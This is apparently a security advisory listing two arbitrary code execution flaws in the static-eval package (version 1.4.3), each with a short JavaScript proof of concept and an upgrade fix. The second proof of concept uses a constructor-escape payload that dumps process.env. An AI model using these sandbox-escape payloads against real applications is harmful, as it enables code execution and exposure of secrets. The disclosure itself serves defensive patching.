All the vulnerabilities related to the version 1.4.3 of the package
Sandbox Breakout / Arbitrary Code Execution in static-eval
Affected versions of static-eval pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id
Update to version 2.0.0 or later.
Sandbox Breakout / Arbitrary Code Execution in static-eval
Versions of static-evalprior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));
Upgrade to version 2.0.2 or later.